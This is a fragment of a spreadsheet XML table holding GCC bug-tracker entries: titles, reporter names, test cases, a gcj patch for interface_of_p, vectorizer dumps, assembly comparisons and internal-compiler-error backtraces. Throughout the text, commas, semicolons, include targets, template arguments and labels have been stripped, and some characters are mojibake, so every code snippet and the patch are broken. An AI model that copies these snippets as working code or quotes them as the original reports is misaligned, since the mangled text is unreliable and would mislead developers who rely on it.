can't be instantiated without an instance of the enclosing class around for some
unfathomable reason.  But gcj compiles it without complaint.
(I appologize if this is a duplicate.  I searched the list of open and fixed
bugs for Java and didn't anything that seemed to be the same problem but it
seems possible that the cause is something already in the bug database but not
obvious to me.)</t>
  </si>
  <si>
    <t>gcc-java</t>
  </si>
  <si>
    <t>GCC-1299</t>
  </si>
  <si>
    <t>full hiearchy of interfaces not checked?</t>
  </si>
  <si>
    <t xml:space="preserve">From: Bryce McKinlay 
To: osk@hem.passagen.se
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/278: full hiearchy of interfaces not checked?
Date: Mon 03 Jul 2000 22:47:35 +1200
 This is a multi-part message in MIME format.
 --------------9BAB4FC556DE4E9507B0F7D1
 Content-Type: text/plain charset=us-ascii
 Content-Transfer-Encoding: 7bit
 osk@hem.passagen.se wrote:
 &gt; If BorderLayout only extends LayoutManager and not LayoutManager2 everything
 &gt; is fine. So it seems that the class hierarchy of interfaces are not checked
 &gt; in arguments.
 This seems to be a case of gcj behaving differently depending on whethere the classes referenced exist as
 .class files or .java files. When the LayoutManager interfaces exist as class files interface_of_p will
 return false (when it should return true) but if they exist as java files it works okay.
 Here is a proposed patch.
 regards
   [ bryce ]
 --------------9BAB4FC556DE4E9507B0F7D1
 Content-Type: text/plain charset=us-ascii
  name=gcj-PR278.patch
 Content-Transfer-Encoding: 7bit
 Content-Disposition: inline
  filename=gcj-PR278.patch
 2000-07-03  Bryce McKinlay  
 	* class.c (interface_of_p): Call load_class on arguments if they're
 	not loaded.
 Index: class.c
 ===================================================================
 RCS file: /cvs/gcc/egcs/gcc/java/class.cv
 retrieving revision 1.70
 diff -u -r1.70 class.c
 --- class.c	2000/06/27 04:30:18	1.70
 +++ class.c	2000/07/03 10:40:51
 @@ -4326 +43211 @@
    int n i
    tree basetype_vec
 +  if (! CLASS_LOADED_P (type1))
 +    load_class (type1 1)
 +  if (! CLASS_LOADED_P (type2))
 +    load_class (type2 1)
 +
    if (!(basetype_vec = TYPE_BINFO_BASETYPES (type2)))
      return 0
    n = TREE_VEC_LENGTH (basetype_vec)
 --------------9BAB4FC556DE4E9507B0F7D1--
</t>
  </si>
  <si>
    <t>GCC-59651</t>
  </si>
  <si>
    <t>[4.9 Regression] Vectorizer failing to spot dependence causes incorrect code generation.</t>
  </si>
  <si>
    <t>Hi
This patch (http://gcc.gnu.org/ml/gcc-patches/2013-12/msg01588.html) seems to uncover a bug in the vectorizer where it fails to spot dependence. 
When test case gcc.dg/torture/pr52943.c is compiled with -O3 the vectorizer generates:
main ()
{
  vector(2) int * vectp_a.10
  vector(2) int * vectp_a.9
  vector(2) int vect_cst_.8
  unsigned int tmp.7
  int tmp.6
  int b_lsm.5
  unsigned int patt_1
  int patt_3
  unsigned int ivtmp_4
  int _5
  _Bool _6
  int _7
  unsigned int ivtmp_8
  int b.1_9
  unsigned int ivtmp_10
  int _11
  int patt_12
  unsigned int patt_15
  int b.0_16
  int b.0_30
  unsigned int ivtmp_31
  int b.1_33
  unsigned int ivtmp_34
  int b.0_37
  unsigned int ivtmp_39
  unsigned int ivtmp_48
  :
  _5 = a[3]
  _6 = _5 &gt; 1
  _7 = (int) _6
  vect_cst_.8_43 = {_7 _7}
  vectp_a.10_44 = 
  :
  # b.0_16 = PHI 
  # ivtmp_4 = PHI 
  # vectp_a.9_45 = PHI 
  # ivtmp_8 = PHI 
  MEM[(int *)vectp_a.9_45] = vect_cst_.8_43
  b.1_9 = b.0_16 + -1
  ivtmp_10 = ivtmp_4 - 1
  vectp_a.9_46 = vectp_a.9_45 + 18446744073709551608
  ivtmp_48 = ivtmp_8 + 1
  if (ivtmp_48 &lt; 1)
    goto 
  else
    goto 
  :
  # b.0_30 = PHI 
  # ivtmp_31 = PHI 
  a[b.0_30] = _7
  b.1_33 = b.0_30 + -1
  ivtmp_34 = ivtmp_31 - 1
  if (ivtmp_34 != 0)
    goto 
  else
    goto 
  :
  goto 
  :
  # b.0_37 = PHI 
  # ivtmp_39 = PHI 
  goto 
  :
  goto 
  :
  b = 0
  _11 = a[1]
  if (_11 != 0)
    goto 
  else
    goto 
  :
  abort ()
  :
  return 0
}
From the above test it seems that _7 is precalculated in BB 2 using
 _5 = a[3]
  _6 = _5 &gt; 1
  _7 = (int) _6
  vect_cst_.8_43 = {_7 _7}
and stored everywhere without considering the dependence on a[3].
  MEM[(int *)vectp_a.9_45] = vect_cst_.8_43
  ...
  # b.0_30 = PHI 
  # ivtmp_31 = PHI 
  a[b.0_30] = _7
  b.1_33 = b.0_30 + -1
  ivtmp_34 = ivtmp_31 - 1
I observed this while running regressions on aarch64. My config is:
.../gcc/configure --target=aarch64-none-elf --prefix=.../install --with-gmp=.../host-tools --with-mpfr=.../host-tools --with-mpc=.../host-tools --with-pkgversion=unknown --disable-shared --disable-nls --disable-threads --disable-tls --enable-checking=yes --enable-languages=cc++ --with-newlib</t>
  </si>
  <si>
    <t>GCC-32421</t>
  </si>
  <si>
    <t>[4.3 Regression] -ftree-vectorize -msse2 ICEs in build2_stat when vectorizing POINTER_PLUS_EXPR</t>
  </si>
  <si>
    <t>Testcase:
int f(int **restrict a int ** restrict b)
{
  int i
  for(i= 0i&lt;32i++)
    a[i] = b[i] + 1
}</t>
  </si>
  <si>
    <t>GCC-33334</t>
  </si>
  <si>
    <t>User-defined type as function result: use-assocciated not accepted</t>
  </si>
  <si>
    <t>(Split off from PR 31154.)
The following is accepted but invalid (without using IMPORT t):
module x
 implicit none
 type t
   integer :: i
 end type t
 interface
   type(t) function bar()
   end function
 end interface
end</t>
  </si>
  <si>
    <t>GCC-60105</t>
  </si>
  <si>
    <t>[C++11] ICE on enable_if explicit cast operator</t>
  </si>
  <si>
    <t>g++ segfaults on enable_if explicit cast operator. 
The code below crashes on gcc-4.8.2 on a mac with 
$ g++-4.8 a.cpp -std=c++11 -o ./a
a.cpp: In function 'int main()':
a.cpp:16:18: internal compiler error: Segmentation fault: 11
     std::cout &lt;&lt; aaaa &lt;&lt; std::endl // This causes a crash
                  ^
a.cpp:16:18: internal compiler error: Abort trap: 6
g++-4.8: internal compiler error: Abort trap: 6 (program cc1plus)
Abort trap: 6
-------------------
#include 
#include 
template 
struct subclass {
    template &lt;typename V2 = V 
              typename = typename std::enable_if::value&gt;::type&gt; 
explicit operator int(){return 1}
    operator V(){return 2.}
    friend std::ostream return out}
}
int main()
{
    subclass aaaa
    subclass bbbb
    std::cout &lt;&lt; aaaa &lt;&lt; std::endl // This causes a crash
    std::cout &lt;&lt; bbbb &lt;&lt; std::endl
    std::cout &lt;&lt; int(aaaa) &lt;&lt; std::endl
    std::cout &lt;&lt; int(bbbb) &lt;&lt; std::endl
}
---------------------
Commenting out the std::cout &lt;&lt; aaaa &lt;&lt; std::endl or removing explicit keyword results in successful compilation and 3
3
2
1 
output as expected. 
g++-4.8 is 
$ g++-4.8 -v
Using built-in specs.
COLLECT_GCC=g++-4.8
COLLECT_LTO_WRAPPER=/usr/local/Cellar/gcc48/4.8.2/libexec/gcc/x86_64-apple-darwin13.0.0/4.8.2/lto-wrapper
Target: x86_64-apple-darwin13.0.0
Configured with: ../configure --build=x86_64-apple-darwin13.0.0 --prefix=/usr/local/Cellar/gcc48/4.8.2 --enable-languages=cc++objcobj-c++ --program-suffix=-4.8 --with-gmp=/usr/local/opt/gmp4 --with-mpfr=/usr/local/opt/mpfr2 --with-mpc=/usr/local/opt/libmpc08 --with-cloog=/usr/local/opt/cloog018 --with-isl=/usr/local/opt/isl011 --with-system-zlib --enable-version-specific-runtime-libs --enable-libstdcxx-time=yes --enable-stage1-checking --enable-checking=release --enable-lto --disable-werror --enable-plugin --disable-nls --disable-multilib
Thread model: posix
gcc version 4.8.2 (GCC)</t>
  </si>
  <si>
    <t>Andrey.E.Antipov</t>
  </si>
  <si>
    <t>GCC-64909</t>
  </si>
  <si>
    <t>[4.8 Regression] Missed vectorization with bdver1</t>
  </si>
  <si>
    <t>Hi
the following loop (taken from firefox unicode stuff)
unsigned short a[32]
unsigned int b[32]
t()
{
  int i
  for (i=0i&lt;12i++)
    b[i]=a[i]
}
compiles by clang to:
t:                                      # @t
        .cfi_startproc
# BB#0:
        vpmovzxwd       a(%rip) %xmm0
        vmovdqa .LCPI0_0(%rip) %xmm1   # xmm1 = [65535655356553565535]
        vpand   %xmm1 %xmm0 %xmm0
        vmovdqa %xmm0 b(%rip)
        vpmovzxwd       a+8(%rip) %xmm0
        vpand   %xmm1 %xmm0 %xmm0
        vmovdqa %xmm0 b+16(%rip)
        vpmovzxwd       a+16(%rip) %xmm0
        vpand   %xmm1 %xmm0 %xmm0
        vmovdqa %xmm0 b+32(%rip)
        retq
GCC 4.7 does:
t:
.LFB0:
        .cfi_startproc
        movzwl  a+16(%rip) %eax
        vmovaps a(%rip) %xmm0
        vpmovzxwd       %xmm0 %xmm1
        vpsrldq $8 %xmm0 %xmm0
        vpmovzxwd       %xmm0 %xmm0
        movl    %eax b+32(%rip)
        movzwl  a+18(%rip) %eax
        vmovaps %xmm1 b(%rip)
        vmovaps %xmm0 b+16(%rip)
        movl    %eax b+36(%rip)
        movzwl  a+20(%rip) %eax
        movl    %eax b+40(%rip)
        movzwl  a+22(%rip) %eax
        movl    %eax b+44(%rip)
        ret
while 4.8 and mainline unrolls and keeps it that way:
t:
.LFB0:
        .cfi_startproc
        movzwl  a(%rip) %eax
        movl    %eax b(%rip)
        movzwl  a+2(%rip) %eax
        movl    %eax b+4(%rip)
        movzwl  a+4(%rip) %eax
        movl    %eax b+8(%rip)
        movzwl  a+6(%rip) %eax
        movl    %eax b+12(%rip)
        movzwl  a+8(%rip) %eax
        movl    %eax b+16(%rip)
        movzwl  a+10(%rip) %eax
        movl    %eax b+20(%rip)
        movzwl  a+12(%rip) %eax
        movl    %eax b+24(%rip)
        movzwl  a+14(%rip) %eax
        movl    %eax b+28(%rip)
        movzwl  a+16(%rip) %eax
        movl    %eax b+32(%rip)
        movzwl  a+18(%rip) %eax
        movl    %eax b+36(%rip)
        movzwl  a+20(%rip) %eax
        movl    %eax b+40(%rip)
        movzwl  a+22(%rip) %eax
        movl    %eax b+44(%rip)
        ret</t>
  </si>
  <si>
    <t>GCC-6176</t>
  </si>
  <si>
    <t>sparc-sun-solaris2.7 gcc-3.1 g++ tree check failure in g++.other/crash32.C</t>
  </si>
  <si>
    <t>I get a tree checking failure in g++.other/crash32.C:
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:11: missing '' before right brace
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:12: destructors must be member functions
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:13: `a' was not declared in this scope
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:13: parse error before `=' token
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:26: `bar' undeclared (first use this function)
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:26: (Each undeclared identifier is reported only once for each function it appears in.)
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:26: syntax error before `' token
/tmp/.foo/branch/egcc-3.1-CVS20020403/gcc/testsuite/g++.old-deja/g++.other/crash32.C:30: tree check: expected namespace_decl have function_decl in binding_for_name at cp/decl.c:2186
It appears to be platform independent since I also get it on irix6.  The test is marked xfail for excess errors and thus the tree checking ICE is overlooked in the reports.  But IMHO the testsuite shouldn't allow a checking ICE pass through.  So there's a bug in both g++ and a bug in the testsuite.
Release:
gcc version 3.1 20020403 (prerelease)
Environment:
sparc-sun-solaris2.7 native as/ld
How-To-Repeat:
configure with tree checking enabled and make check-c++</t>
  </si>
  <si>
    <t>GCC-19038</t>
  </si>
  <si>
    <t>[4.0 Regression] tree-ssa causing loops to have more than one BB</t>
  </si>
  <si>
    <t>Loop header copying would allow some loops to be transformed from two or more 
basic blocks into a single basic block allowing better scheduling of the 
instructions in the loop.  This would help SPEC CPU2000 sixtrack benchmark 
for example.</t>
  </si>
  <si>
    <t>GCC-34213</t>
  </si>
  <si>
    <t>[4.2 Regression] static member function in anonymous namespace can't be used as template argument</t>
  </si>
  <si>
    <t>trying to use member functions of classes in the anonymous namespace as template argument doesn't work.
the following code illustrates this issue:
template 
void call(void)
{
    fn()
}
namespace
{
struct bar
{
    static void fn(void) {}
}
}
int main()
{
    call&lt;
}
it complains:
error: â€˜::bar::fnâ€™ is not a valid template argument for type â€˜void (*)()â€™ because function â€˜static void::bar::fn()â€™ has not external linkage
gcc -v:
tim@laptop:~$ gcc -v
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure -v --enable-languages=cc++fortranobjcobj-c++treelang --prefix=/usr --enable-shared --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --enable-nls --with-gxx-include-dir=/usr/include/c++/4.2 --program-suffix=-4.2 --enable-clocale=gnu --enable-libstdcxx-debug --enable-mpfr --enable-targets=all --enable-checking=release --build=i486-linux-gnu --host=i486-linux-gnu --target=i486-linux-gnu
Thread model: posix
gcc version 4.2.3 20071014 (prerelease) (Debian 4.2.2-3)
would be great to have this fixed ...</t>
  </si>
  <si>
    <t>GCC-17871</t>
  </si>
  <si>
    <t>libgfortran g77: regression zero has non-zero exponent</t>
  </si>
  <si>
    <t>Hi
I get strange output with gfortran and g77 with the following code:
      write (*'(3p2e15.3)') 0.0 1.0
      end
Running the g77 compiled code gives:
      000.0E+00      100.0E-02
while the gfortran compiled code gives:
      000.0E-03      100.0E-02
While the second number (1.0) prints OK in both cases
the first (0.0) looks really strange to me.  Other compilers give:
        0.0E+00      100.0E-02
which looks most natural to me.
I cannot find anything in the standard prohibiting the result of g77
or even that of gfortran but I consider both as surprising.
Cheers
-ha</t>
  </si>
  <si>
    <t>GCC-55446</t>
  </si>
  <si>
    <t>[4.7/4.8 Regression] array new with size zero vanishes from object code</t>
  </si>
  <si>
    <t>The following program compiles successfully and outputs nothing at all.  In fact the generated assembly has an empty main.  This happens even when compiling with -O0.
#include 
struct S {
  S() { }
}
int main()
{
  std::cout &lt;&lt; new S[0] &lt;&lt;  bla &lt;&lt; std::endl
}
$  g++ new-opt.cc -Wall -Wextra 
$ ./a.out 
(no output)
The issue goes away when removing the default constructor of S.  It seems gcc believes array-new with zero size is undefined behavior and thus removes the rest of the expression.  I can't follow the undefined behavior part array-new with zero size should yield a non-zero pointer (see 3.7.3.1p2 [basic.stc.dynamic.allocation] and 5.3.4p7 [expr.new]).</t>
  </si>
  <si>
    <t>jens.maurer</t>
  </si>
  <si>
    <t>GCC-44662</t>
  </si>
  <si>
    <t>unitialized memory on testcases abstract_type_6.f03 and typebound_call_4.f03</t>
  </si>
  <si>
    <t>I think this was not reported yet and both refer to the same problem.</t>
  </si>
  <si>
    <t>GCC-30335</t>
  </si>
  <si>
    <t>CreateFileMapping fails in Vista due to lack of admin privileges</t>
  </si>
  <si>
    <t>Christoph_vW</t>
  </si>
  <si>
    <t>GCC-481</t>
  </si>
  <si>
    <t>gcc 2.96 type crash on member pointer to union member</t>
  </si>
  <si>
    <t>I suspect the small example is legal code.
Getting the member pointer to a field works correctly.
When that field is mentioned as a component of a union the
type checking code complains and crashes the compiler.
I think the crash and the error are both incorrect.
Release:
gcc version 2.96 20000817 (experimental)
Environment:
N/A  (i686Linux2.2.15)
How-To-Repeat:
c++ foo.cpp</t>
  </si>
  <si>
    <t>fiddlestyx</t>
  </si>
  <si>
    <t>GCC-53214</t>
  </si>
  <si>
    <t>[lto]: ICE: munmap_chunk(): invalid pointer</t>
  </si>
  <si>
    <t>when __attribute__ added to function
example reduced from real life code
cat ltoCrash.cc
#include
struct A {  
double  a(double r int ) const  __attribute__ ((optimize(3 fast-math)))
double b
}
double A::a(double r int c) const { 
   if (c&lt;0) r = -r 
   return b/std::sqrt(r)
}
[vocms123] /build/vin/CMSSW_6_0_X_2012-05-03-0200 $ c++ -O2 -flto -fPIC -shared -o bha.so ltoCrash.cc
*** glibc detected *** /afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1: munmap_chunk(): invalid pointer: 0x00002b0a9558b308 ***
======= Backtrace: =========
/lib64/libc.so.6(cfree+0x166)[0x3a4f6712f6]
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1[0x4c263c]
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1(_Z8lto_mainv+0xeeb)[0x4c544b]
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1(_Z11toplev_mainiPPc+0xa10)[0x7f9d40]
/lib64/libc.so.6(__libc_start_main+0xf4)[0x3a4f61d994]
/afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1[0x4a5f19]
======= Memory map: ========
00400000-01116000 r-xp 00000000 00:15 305728764                          /afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1
01116000-01121000 rw-p 00d16000 00:15 305728764                          /afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto1
01121000-0127f000 rw-p 01121000 00:00 0 
06570000-06631000 rw-p 06570000 00:00 0                                  [heap]
3a4f200000-3a4f21c000 r-xp 00000000 08:02 1501774                        /lib64/ld-2.5.so
3a4f41c000-3a4f41d000 r--p 0001c000 08:02 1501774                        /lib64/ld-2.5.so
3a4f41d000-3a4f41e000 rw-p 0001d000 08:02 1501774                        /lib64/ld-2.5.so
3a4f600000-3a4f74d000 r-xp 00000000 08:02 1501777                        /lib64/libc-2.5.so
3a4f74d000-3a4f94d000 ---p 0014d000 08:02 1501777                        /lib64/libc-2.5.so
3a4f94d000-3a4f951000 r--p 0014d000 08:02 1501777                        /lib64/libc-2.5.so
3a4f951000-3a4f952000 rw-p 00151000 08:02 1501777                        /lib64/libc-2.5.so
3a4f952000-3a4f957000 rw-p 3a4f952000 00:00 0 
3a4fa00000-3a4fa02000 r-xp 00000000 08:02 1501779                        /lib64/libdl-2.5.so
3a4fa02000-3a4fc02000 ---p 00002000 08:02 1501779                        /lib64/libdl-2.5.so
3a4fc02000-3a4fc03000 r--p 00002000 08:02 1501779                        /lib64/libdl-2.5.so
3a4fc03000-3a4fc04000 rw-p 00003000 08:02 1501779                        /lib64/libdl-2.5.so
3a50200000-3a50282000 r-xp 00000000 08:02 1501780                        /lib64/libm-2.5.so
3a50282000-3a50481000 ---p 00082000 08:02 1501780                        /lib64/libm-2.5.so
3a50481000-3a50482000 r--p 00081000 08:02 1501780                        /lib64/libm-2.5.so
3a50482000-3a50483000 rw-p 00082000 08:02 1501780                        /lib64/libm-2.5.so
2b0a9414d000-2b0a9414f000 rw-p 2b0a9414d000 00:00 0 
2b0a9414f000-2b0a945b2000 r-xp 00000000 00:15 1062144158                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libppl_c.so.4.0.0
2b0a945b2000-2b0a947b1000 ---p 00463000 00:15 1062144158                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libppl_c.so.4.0.0
2b0a947b1000-2b0a947b7000 rw-p 00462000 00:15 1062144158                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libppl_c.so.4.0.0
2b0a947b7000-2b0a948db000 r-xp 00000000 00:15 1062144152                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libppl.so.10.0.0
2b0a948db000-2b0a94adb000 ---p 00124000 00:15 1062144152                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libppl.so.10.0.0
2b0a94adb000-2b0a94ade000 rw-p 00124000 00:15 1062144152                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libppl.so.10.0.0
2b0a94ade000-2b0a94ae3000 rw-p 2b0a94ade000 00:00 0 
2b0a94ae3000-2b0a94ae7000 r-xp 00000000 00:15 1062144128                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libgmpxx.so.4.2.2
2b0a94ae7000-2b0a94ce6000 ---p 00004000 00:15 1062144128                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libgmpxx.so.4.2.2
2b0a94ce6000-2b0a94ce7000 rw-p 00003000 00:15 1062144128                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libgmpxx.so.4.2.2
2b0a94ce7000-2b0a94d37000 r-xp 00000000 00:15 1062144144                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libmpfr.so.4.0.1
2b0a94d37000-2b0a94f37000 ---p 00050000 00:15 1062144144                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libmpfr.so.4.0.1
2b0a94f37000-2b0a94f39000 rw-p 00050000 00:15 1062144144                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libmpfr.so.4.0.1
2b0a94f39000-2b0a94f9c000 r-xp 00000000 00:15 1062144122                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libgmp.so.10.0.2
2b0a94f9c000-2b0a9519b000 ---p 00063000 00:15 1062144122                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libgmp.so.10.0.2
2b0a9519b000-2b0a951a4000 rw-p 00062000 00:15 1062144122                 /afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0/lib/libgmp.so.10.0.2
2b0a951a4000-2b0a951a6000 rw-p 2b0a951a4000 00:00 0 
2b0a951a6000-2b0a95294000 r-xp 00000000 00:15 305729518                  /afs/cern.ch/user/i/innocent/w3/gcc47slc5/lib64/libstdc++.so.6.0.17
2b0a95294000-2b0a95295000 ---p 000ee000 00:15 305729518                  /afs/cern.ch/user/i/innocent/w3/gcc47slc5/lib64/libstdc++.so.6.0.17
2b0a95295000-2b0a9529d000 r--p 000ee000 00:15 305729518                  /afs/cern.ch/user/i/innocent/w3/gcc47slc5/lib64/libstdc++.so.6.0.17
2b0a9529d000-2b0a952a0000 rw-p 000f6000 00:15 305729518                  /afs/cern.ch/user/i/innocent/w3/gcc47slc5/lib64/libstdc++.so.6.0.17
2b0a952a0000-2b0a952b5000 rw-p 2b0a952a0000 00:00 0 
2b0a952b5000-2b0a952ca000 r-xp 00000000 00:15 305727650                  /afs/cern.ch/user/i/innocent/w3/gcc47slc5/lib64/libgcc_s.so.1
2b0a952ca000-2b0a952cb000 rw-p 00015000 00:15 305727650                  /afs/cern.ch/user/i/innocent/w3/gcc47slc5/lib64/libgcc_s.so.1
2b0a952cb000-2b0a95526000 rw-p 2b0a952cb000 00:00 0 
2b0a95526000-2b0a95527000 r--p 00000000 08:03 47644683                   /tmp/innocent/cc6SeNpx.ltrans0.o
2b0a95527000-2b0a9558b000 rw-p 2b0a95527000 00:00 0 
2b0a9558b000-2b0a9558c000 r--p 00000000 08:03 47644683                   /tmp/innocent/cc6SeNpx.ltrans0.o
7fff47884000-7fff4789d000 rw-p 7ffffffe5000 00:00 0                      [stack]
7fff478b2000-7fff478b5000 r-xp 7fff478b2000 00:00 0                      [vdso]
ffffffffff600000-ffffffffffe00000 ---p 00000000 00:00 0                  [vsyscall]
In member function 'a':
lto1: internal compiler error: Aborted
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
lto-wrapper: c++ returned 1 exit status
collect2: error: lto-wrapper returned 1 exit status
 c++ -v
Using built-in specs.
COLLECT_GCC=c++
COLLECT_LTO_WRAPPER=/afs/cern.ch/user/i/innocent/w3/gcc47slc5/libexec/gcc/x86_64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ./configure --enable-languages=cc++fortran --disable-multilib --enable-gold=yes --disable-nls --enable-lto --with-mpc=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --with-gmp=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --with-mpfr=/afs/cern.ch/cms/slc5_amd64_gcc470/external/gcc/4.7.0 --prefix=/afs/cern.ch/user/i/innocent/w3/gcc47slc5
Thread model: posix
gcc version 4.8.0 20120501 (experimental) [trunk revision 187020] (GCC)</t>
  </si>
  <si>
    <t>GCC-54410</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] doubled DW_TAG_template_type_param</t>
  </si>
  <si>
    <t xml:space="preserve">I'm using a relatively recent git gcc:
commit d789d72be457df9811328179702cab8ac5830465
Author: walt 
Date:   Mon Aug 27 17:27:04 2012 +0000
I compiled this program derived from a libstdc++ test case:
#include 
#include 
typedef std::unordered_set Set
Set m
int main()
{
}
The DWARF shows duplicate template arguments for unordered_set.
I think each parameter name should appear just a single time:
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x6e7): _Value	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x6f29): _Hash	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x9ebb): _Pred	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x7826): _Alloc	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x6e7): _Value	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x6f29): _Hash	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x9ebb): _Pred	
       DW_AT_type        : 	
 : Abbrev Number: 46 (DW_TAG_template_type_param)
       DW_AT_name        : (indirect string offset: 0x7826): _Alloc	
       DW_AT_type        : </t>
  </si>
  <si>
    <t>GCC-70386</t>
  </si>
  <si>
    <t>[6 Regression] ICE with -Wall on valid code on x86_64-linux-gnu in verify_ctor_sanity at cp/constexpr.c:2232</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current GCC trunk with -Wall on x86_64-linux-gnu in both 32-bit and 64-bit modes.  
This is a regression from 5.3.x.
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 6.0.0 20160323 (experimental) [trunk revision 234418] (GCC) 
$ 
$ g++-trunk small.cpp
$ g++-5.3 -Wall small.cpp
$                              
$ g++-trunk -Wall small.cpp
small.cpp: In function â€˜int main()â€™:
small.cpp:14:20: internal compiler error: in verify_ctor_sanity at cp/constexpr.c:2232
   return (cp () == d)
                    ^
0x845875 verify_ctor_sanity
	../../gcc-source-trunk/gcc/cp/constexpr.c:2232
0x852643 cxx_eval_bare_aggregate
	../../gcc-source-trunk/gcc/cp/constexpr.c:2257
0x84d924 cxx_eval_constant_expression
	../../gcc-source-trunk/gcc/cp/constexpr.c:3699
0x851fa9 cxx_eval_component_reference
	../../gcc-source-trunk/gcc/cp/constexpr.c:1954
0x84e2dc cxx_eval_constant_expression
	../../gcc-source-trunk/gcc/cp/constexpr.c:3670
0x8538f9 cxx_eval_outermost_constant_expr
	../../gcc-source-trunk/gcc/cp/constexpr.c:3947
0x8565bc maybe_constant_value_1
	../../gcc-source-trunk/gcc/cp/constexpr.c:4135
0x8565bc maybe_constant_value(tree_node* tree_node*)
	../../gcc-source-trunk/gcc/cp/constexpr.c:4156
0x779c36 cp_build_binary_op(unsigned int tree_code tree_node* tree_node* int)
	../../gcc-source-trunk/gcc/cp/typeck.c:5096
0x77b747 cp_build_binary_op(unsigned int tree_code tree_node* tree_node* int)
	../../gcc-source-trunk/gcc/cp/typeck.c:4729
0x623d3a build_new_op_1
	../../gcc-source-trunk/gcc/cp/call.c:5782
0x624d4e build_new_op(unsigned int tree_code int tree_node* tree_node* tree_node* tree_node** int)
	../../gcc-source-trunk/gcc/cp/call.c:5827
0x766322 build_x_binary_op(unsigned int tree_code tree_node* tree_code tree_node* tree_code tree_node** int)
	../../gcc-source-trunk/gcc/cp/typeck.c:3866
0x740946 cp_parser_binary_expression
	../../gcc-source-trunk/gcc/cp/parser.c:8923
0x7410a0 cp_parser_assignment_expression
	../../gcc-source-trunk/gcc/cp/parser.c:9055
0x743979 cp_parser_expression
	../../gcc-source-trunk/gcc/cp/parser.c:9222
0x73504e cp_parser_primary_expression
	../../gcc-source-trunk/gcc/cp/parser.c:4878
0x736816 cp_parser_postfix_expression
	../../gcc-source-trunk/gcc/cp/parser.c:6690
0x73f95c cp_parser_unary_expression
	../../gcc-source-trunk/gcc/cp/parser.c:7988
0x7401b7 cp_parser_cast_expression
	../../gcc-source-trunk/gcc/cp/parser.c:8665
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
---------------------------------------
